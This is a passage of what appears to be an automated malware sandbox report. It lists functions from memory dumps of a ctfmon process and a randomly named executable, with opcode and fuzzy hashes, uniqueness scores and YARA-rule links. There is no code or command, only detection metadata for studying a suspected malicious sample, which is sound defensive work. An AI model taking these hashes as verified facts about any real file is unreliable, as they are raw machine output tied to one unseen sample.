Opcode ID: e7341d09767dd5204555982342fa2d2a9bf7d338fd4a6f6787db28852ec6e8b7
Instruction ID: 1fbbb5b03b586f04d8ebe518a7fe9ec5a608f0108c1ea53c53b47e14ccd859c4
Opcode Fuzzy Hash: e7341d09767dd5204555982342fa2d2a9bf7d338fd4a6f6787db28852ec6e8b7
Instruction Fuzzy Hash: C5113C3090C98E9FE751FBB8C8586A9BFE4FF1A341F0508B6D409C7092EB38A590C759

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F54F29 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c2518ebbef876c5b1833cffa6c942747f491a8785072d9d111111082e7a7a83
Instruction ID: cbb2e67d6c232d43f1c30fc455cd0f48ec2ad5bd4ed17388e9f8e496f6eb2a44
Opcode Fuzzy Hash: 5c2518ebbef876c5b1833cffa6c942747f491a8785072d9d111111082e7a7a83
Instruction Fuzzy Hash: 77118B7080D68A8FEB85EB2888692B9BBF0FF29341F0404BAC409C75D2DB286444CB15

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F527D1 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47abb671c8a99a3eefcf6536c288eccf2e8639727f3226f0110cd2f1a78ee7c5
Instruction ID: 6212fae8c6ab8ff36bf9212f968b8627df629b780982ac3dc85f0c14b073d75f
Opcode Fuzzy Hash: 47abb671c8a99a3eefcf6536c288eccf2e8639727f3226f0110cd2f1a78ee7c5
Instruction Fuzzy Hash: BF11613090D59A9EE742FBB8885C5F9BBE0FF19341F1445B7D418C7096EB34A145C745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F434F5 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f1812b146402cf553d1569623133098efad48375deadc689e1d7c7ec40b15ac
Instruction ID: bd0b574fcadcf63dfd28259c0e0e1eeb4b84c71f1921263e9547c3895a45c931
Opcode Fuzzy Hash: 9f1812b146402cf553d1569623133098efad48375deadc689e1d7c7ec40b15ac
Instruction Fuzzy Hash: 6A115E7091C68E8FDB59EF688459ABD7BA0FF28701F4404BFD419D61D1DB35A540C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F54C3D Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 254de7781436698210f55c7900c7456fff449d8ecc5e75d6efdbcb59681ad144
Instruction ID: ef36aeaf5efcd0ee79e11d342f10d0108750fc44f7618f3f39bdc2c976946d52
Opcode Fuzzy Hash: 254de7781436698210f55c7900c7456fff449d8ecc5e75d6efdbcb59681ad144
Instruction Fuzzy Hash: F0119D7080DA8A9FEB89EB6484692BEBBA0FF69301F0404BEC009C71D3DB39A440C715

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4BCE5 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f4a000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c6fd7d561140d6adc69406333487fac7dc29a78c774f0a8f87a9f6a648b3ccf
Instruction ID: 44e9262e12b2f1f6381b6e198635941de44241bb9e330ee538a31b52f3994b08
Opcode Fuzzy Hash: 9c6fd7d561140d6adc69406333487fac7dc29a78c774f0a8f87a9f6a648b3ccf
Instruction Fuzzy Hash: 2A113C3091964E8FDB89EF6488592BDBBF0FF28341F4004BBD419D61D2DB76A540C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F54E9D Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e5d1c349487bb487c3482982dd1a2875b00770587885d83098e91c50dd0f971
Instruction ID: 1a562f43c5e0b1db778483b9414b958777866bb93131bfc2db9e2acf4c574baf
Opcode Fuzzy Hash: 0e5d1c349487bb487c3482982dd1a2875b00770587885d83098e91c50dd0f971
Instruction Fuzzy Hash: C811BF7080D68A8FEB49EB2484696BDBBE0FF28301F0404BAC409C35D2DB29A580C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F42E61 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 317d417048e4cd3c0aa0453289d0641598fa12349dcbb66b2642fbf8130b82e8
Instruction ID: 39b7b6a333df80e789d2972c8317a967f06798215ccf8776e64201fefbe87986
Opcode Fuzzy Hash: 317d417048e4cd3c0aa0453289d0641598fa12349dcbb66b2642fbf8130b82e8
Instruction Fuzzy Hash: 54017830D0D68E8FE751FBA888486A97BE0EF69741F0508B7D40CD71E2EB38E4448704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4B025 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f4a000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32fc78555206edbe528cd92fc96b12e3b81668c0fbc4cdf89c053264b5b94630
Instruction ID: a9bc7e9f4787ebb7e44849d9ac89ca9893da5dca817df4bd5e82115ffb5cbc2d
Opcode Fuzzy Hash: 32fc78555206edbe528cd92fc96b12e3b81668c0fbc4cdf89c053264b5b94630
Instruction Fuzzy Hash: 15018C3092C64E8FE741FB6888485A9BBE0FF29341F4504B7D418E60E3EB34E584C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F405D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f42d68f278fc2483fc8c058a63aa679ecc70ae1ece36717991fd801a36c8e0f9
Instruction ID: dcc513c825db2bbd0fe3fb518d8d6dd7d6c010302c176580c203d6826ad00882
Opcode Fuzzy Hash: f42d68f278fc2483fc8c058a63aa679ecc70ae1ece36717991fd801a36c8e0f9
Instruction Fuzzy Hash: 3C019E3090851E8FEB48EF24C4596FA77A1FF68345F10047ED40ED21D1CB35A5A0CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F57D31 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F57000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F57000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f57000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19c436eaabd68f721ae6ccc81f5875a565f44bb2641a53cec41e36ac73e8ec4e
Instruction ID: 38b5569aaad00b5f865f2169d9678d8bfbf32a1495b7dd4c01d816af275d8a37
Opcode Fuzzy Hash: 19c436eaabd68f721ae6ccc81f5875a565f44bb2641a53cec41e36ac73e8ec4e
Instruction Fuzzy Hash: B701BC3085EA898FDB49EF24C8692BDBBA0FF19340F0404BED40AC65D6DF79A540C744

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F52275 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33e6eae8c3f8eb473bb8dbbcff60e74a39e358681033e1c394abc47b523c4f5f
Instruction ID: 7b098906ba953d3b06d053530b4e736c5a39e968159a508d97cb05556884248d
Opcode Fuzzy Hash: 33e6eae8c3f8eb473bb8dbbcff60e74a39e358681033e1c394abc47b523c4f5f
Instruction Fuzzy Hash: 8301DF3084D6899FEB49EF74C4586BABBA0FF1A300F0109BAD41AC60D3EF35A554CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4283D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efbfc4a7481ff57338bcf68976f3bba4be0ab26dd489d8895032a2d3c6459bae
Instruction ID: ddf848f43f2e9c0337686f97f9af5b7a1739ed0627013854cd124387e17e58e2
Opcode Fuzzy Hash: efbfc4a7481ff57338bcf68976f3bba4be0ab26dd489d8895032a2d3c6459bae
Instruction Fuzzy Hash: 6F01783085D64E8FE795BBA488886A97BE0EF69741F5505B7D808D60A2EB38E0848704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F57DAD Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F57000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F57000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f57000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0ca26ac9753f80b04bad789a582cdcc4179f05691e27ae05f9ef696f1b63cc5
Instruction ID: 4492494568f7a5bc62c10929a6e3758502f9e01dac361b2c205649a9a059d152
Opcode Fuzzy Hash: c0ca26ac9753f80b04bad789a582cdcc4179f05691e27ae05f9ef696f1b63cc5
Instruction Fuzzy Hash: 09019E3190DA898FDB4AEB3484596BABBA0FF19340F0504BED40AC61D3DF25A950C755

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4AB15 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f4a000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d239ffec8a81d17551f4636694669702a646584c512c43e0ac0194374d843665
Instruction ID: c8fe383a44ad006fa0cfcaf45e4a5e95acf54d17eb3d2d1f642897d8a98186fc
Opcode Fuzzy Hash: d239ffec8a81d17551f4636694669702a646584c512c43e0ac0194374d843665
Instruction Fuzzy Hash: 8FF0FC36A0E3964FD313A72DBCE11DA7B74EFA2168B0943B7C184CA0D3DA1D944E43A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F42ED9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fee1fe5919b80fa70b88536cf1758a6334b40a36ccc3024810dba7e8f91ad1f
Instruction ID: ad19472d6d264e79e2db892d39285c6c94b4615638b1322728a78ef147a402b4
Opcode Fuzzy Hash: 6fee1fe5919b80fa70b88536cf1758a6334b40a36ccc3024810dba7e8f91ad1f
Instruction Fuzzy Hash: AF017C3191D6899FE742FB7488592A97FE0EF6A750F4604B7D408DB0E6EB38A4448711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4AAA9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f4a000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39a99d7293ba47454e49b6437cd3a2708a2a06c04b9f451492a671d145985d0c
Instruction ID: 6e40d9300ae58805606dcdf1f221288430384cdeb5c50232c16ff00fa8de6c96
Opcode Fuzzy Hash: 39a99d7293ba47454e49b6437cd3a2708a2a06c04b9f451492a671d145985d0c
Instruction Fuzzy Hash: 3A018F3194D6898FE752BB34895D5A97BE0EF29380F0509F3D008D70E2EB78A484C711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F575C9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F57000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F57000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f57000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4eec6d97927537bac5d97569eb5a38ebb7fb8044c9ec3755f70b85f70bd21c0
Instruction ID: fe6e1db1a0c77775663900e8efb41e135e7bb39812823e358afee477d6dab3dd
Opcode Fuzzy Hash: e4eec6d97927537bac5d97569eb5a38ebb7fb8044c9ec3755f70b85f70bd21c0
Instruction Fuzzy Hash: 32017C7084EA8A5FE742AB2888591A9BBE0EF1A340F0508B2D408C70A3EB28A4488705

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F40608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22eecbe54fe0cb3e7804a29ae1bce0dc80a6c23ec6cdec6adc2a67d3417e1cf9
Instruction ID: f3ffc43dc4e63e21e66d8fd6abc9e6c039388ab25f096b3bfa77127e0db8fce2
Opcode Fuzzy Hash: 22eecbe54fe0cb3e7804a29ae1bce0dc80a6c23ec6cdec6adc2a67d3417e1cf9
Instruction Fuzzy Hash: 9501693091860E9EEB59FBA484586BE7AA1FF28345F60087EE40ED21D1DF35A590C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F40610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6af41eb60cda603a6f4c19a9b9a772ab453c0d1307fa3d8260b2376214e99334
Instruction ID: bb868f3190093210850f3154d1191cf9a9ee4a00bd7afce8ed0b0c5af7cbd05a
Opcode Fuzzy Hash: 6af41eb60cda603a6f4c19a9b9a772ab453c0d1307fa3d8260b2376214e99334
Instruction Fuzzy Hash: 21016930918A0E9FEB59EB6484592BDB7E0FF28345F20087FE40ED21D1DF39A550C614

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F41BED Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d0da3de76ee3d48bb916061eca11683fc3d8f9f956905b3d35f28ede79ad190
Instruction ID: 42002dcc3f9552b7c6b2699d7b7df4f49da2da5d7d6a87580818cf059423d7a8
Opcode Fuzzy Hash: 9d0da3de76ee3d48bb916061eca11683fc3d8f9f956905b3d35f28ede79ad190
Instruction Fuzzy Hash: 7401AD3080D69D8FEB99EF2488552B93BA0FF65741F4401BAE808D21D2DB399490C744

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4BE37 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f4a000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b560281b64557949bb1898814a498c69014c2f177a1c779df31e33e5358b09d3
Instruction ID: 9f6d19d9d6c4af0969197953f72c75a506bc67f83b3412139aeff2b17af85802
Opcode Fuzzy Hash: b560281b64557949bb1898814a498c69014c2f177a1c779df31e33e5358b09d3
Instruction Fuzzy Hash: 4E01C870D0960ACFDB18EF84D8906EDB7B1EF58360F24002ED516B32D1CB386951CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F405D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f03b64c41de2b98d88230dfec549a526cca3089ad8813b0ce672a25ef9e228c
Instruction ID: fc8720494a0a633004d9522744c1b5316c87087321820f00300cd903f8cc78fd
Opcode Fuzzy Hash: 6f03b64c41de2b98d88230dfec549a526cca3089ad8813b0ce672a25ef9e228c
Instruction Fuzzy Hash: F3F0C23080E65E8FEB44EF2498052FA77A4FF25349F10053AE80DD21C1DB39A4A0CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F42759 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a45c2048a6374ea9f62a5d3b07bc5d405797b5af9fee9bd9f61356afde6ad64e
Instruction ID: 9331fb1bef328260021cb88450374fa32e4cea764c156c5536e099f4ff581be5
Opcode Fuzzy Hash: a45c2048a6374ea9f62a5d3b07bc5d405797b5af9fee9bd9f61356afde6ad64e
Instruction Fuzzy Hash: 46F0C23180E38A8FEB5AAF6488582A93F61FF26701F5504BBD409C61D2DB38A404C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F57AB3 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F57000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F57000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f57000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f62ffa2e2091a891026d0d14efd0126d75e882d3ce546383eba9905901a8ca0
Instruction ID: 06513b2609df0c5d95ecaf4d09c96707f92886bab2d898c53898626a19f242e5
Opcode Fuzzy Hash: 8f62ffa2e2091a891026d0d14efd0126d75e882d3ce546383eba9905901a8ca0
Instruction Fuzzy Hash: EAF05E35E0891D8BDF18EB98E8954FDB7B2FF98300F50013AD10DE7282CF246A058B64

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F427CD Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e871c621b8b7b770c02ba3a1b3ceb79e51975a53bb362657f1a78bff7911487f
Instruction ID: cb991cd6ff4d3f5321dbc34b0317e1c9249aec42cb1f8a66c9fa37092e6d827e
Opcode Fuzzy Hash: e871c621b8b7b770c02ba3a1b3ceb79e51975a53bb362657f1a78bff7911487f
Instruction Fuzzy Hash: 02F09A3181E68E8FEB59AF6488192BD7BA0FF26241F5505BBE809C60D2EB399454C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F41710 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3edcd640d88b40015f0de0df0a0e549db975d9348add14aa2e4d1e4220305169
Instruction ID: 6c5d3acea40b629729677d22d812f5cf73ec78ead578db8569acc776baa372dc
Opcode Fuzzy Hash: 3edcd640d88b40015f0de0df0a0e549db975d9348add14aa2e4d1e4220305169
Instruction Fuzzy Hash: 0BE06D30E1D8164EEA647318808467461D1EF647A4FB88276F01CDA1E1EB2CECC3C208

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4BEDE Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f4a000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f04f2779dc15e9edc6559c982889914b692a47402aa9b05ce8a8a289afef7063
Instruction ID: 432d5e93ef196a9f23c838344a8cc95463de74a6589011e1eb9f4e341ae95af7
Opcode Fuzzy Hash: f04f2779dc15e9edc6559c982889914b692a47402aa9b05ce8a8a289afef7063
Instruction Fuzzy Hash: 0CD04235A1892D8EDF40EBD8D8445EDB3B5FB68391F000126D51DE7295DB6068108B44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F451AE Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3266d8a40465b9dfa420b565482d1afff400db45b785ab8e3b603c6d57e198d7
Instruction ID: 93c248fdcfef05c52414fda2be3a277cffb0f78bfd57f1e62a18e9368a73f1cf
Opcode Fuzzy Hash: 3266d8a40465b9dfa420b565482d1afff400db45b785ab8e3b603c6d57e198d7
Instruction Fuzzy Hash: F9E09670D59E1D8EEBB5EB588C54BB9B6B1BB58642F5010EBC00DF2291DE356A809F04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4B32B Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f4a000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1af28936396afa2df753c2ceaa01395029253ff690a087cbaa0142bd0e2dbce4
Instruction ID: bfc40c210b6d41a755e227f6cc832c2637a66d357ab0d67a4f2b93d1cf6e3fa5
Opcode Fuzzy Hash: 1af28936396afa2df753c2ceaa01395029253ff690a087cbaa0142bd0e2dbce4
Instruction Fuzzy Hash: 7AD0173081E55A9EDB90F714C851AE9B770AF25340F1042A2810ED2182CE38AA808B44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F40FA5 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 958fbeb2c11d572b18bfae883dddaf795a4b9c20a6c2db183dbb9145634f8ed3
Instruction ID: 89a6ce6a72d087ab811e4e13938d27613abb5aa2760205f89c962f02e55e85a3
Opcode Fuzzy Hash: 958fbeb2c11d572b18bfae883dddaf795a4b9c20a6c2db183dbb9145634f8ed3
Instruction Fuzzy Hash: E1E0EC30D1A51D8EE750FB14D804BAEAAB1FF54344F5041B6D10DA32C2CF386D408F58

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F48EA7 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 487edb672a762525586fd55eb3a7895dc7cc08b8751fd058bf0e3449a35b2169
Instruction ID: 1fcd93db17b1ec71ea38586106e23ca01b0735dee579fe73f3e938c6a10819e6
Opcode Fuzzy Hash: 487edb672a762525586fd55eb3a7895dc7cc08b8751fd058bf0e3449a35b2169
Instruction Fuzzy Hash: 6CD06770909A198ED764EB048854769B261FB54642F1005F7850DF73D1EE742A808F04

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF848F51001 Relevance: 7.6, Strings: 6, Instructions: 131COMMON

Download Yara Rule

Strings

&, xrefs: 00007FF848F51A12
", xrefs: 00007FF848F51A67
{, xrefs: 00007FF848F51001
", xrefs: 00007FF848F5129E
[, xrefs: 00007FF848F512E4
/, xrefs: 00007FF848F51870

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID: "$"$&$/$[${
API String ID: 0-683516320
Opcode ID: 76e8b2553306c7a762bf02d96e58d16827ac713ada0203a758630aacac3eafb9
Instruction ID: cb48e7462d76186caff64f6619aed8c676622097c88ef8017e03eee3f464cfb0
Opcode Fuzzy Hash: 76e8b2553306c7a762bf02d96e58d16827ac713ada0203a758630aacac3eafb9
Instruction Fuzzy Hash: 5C51D370D082298FEB68EF55C4947BDBAB1BF54395F2040BAD05EA72C2CB386984DF14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F5199B Relevance: 5.1, Strings: 4, Instructions: 76COMMON

Download Yara Rule

Strings

}, xrefs: 00007FF848F519DF
&, xrefs: 00007FF848F51A12
", xrefs: 00007FF848F51A67
/, xrefs: 00007FF848F51870

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID: "$&$/$}
API String ID: 0-3572482012
Opcode ID: c0b9440c54c56e73e76cde5c4196e37fb96f94aa2c2bcbc44ecf7b88862913c3
Instruction ID: 6fadd8a097a4f54201b47955b5c437b8f9c651826303bea16b429069346e5280
Opcode Fuzzy Hash: c0b9440c54c56e73e76cde5c4196e37fb96f94aa2c2bcbc44ecf7b88862913c3
Instruction Fuzzy Hash: 9F310034D082298FDBA8EF54C8907BDB7B1FB54755F1044AAD00AAB2E1DB386A84CF40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: QeWHGGzCXwoQygZUiDI.exePID: 2796, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848F5139C Relevance: 3.8, Strings: 3, Instructions: 76COMMON

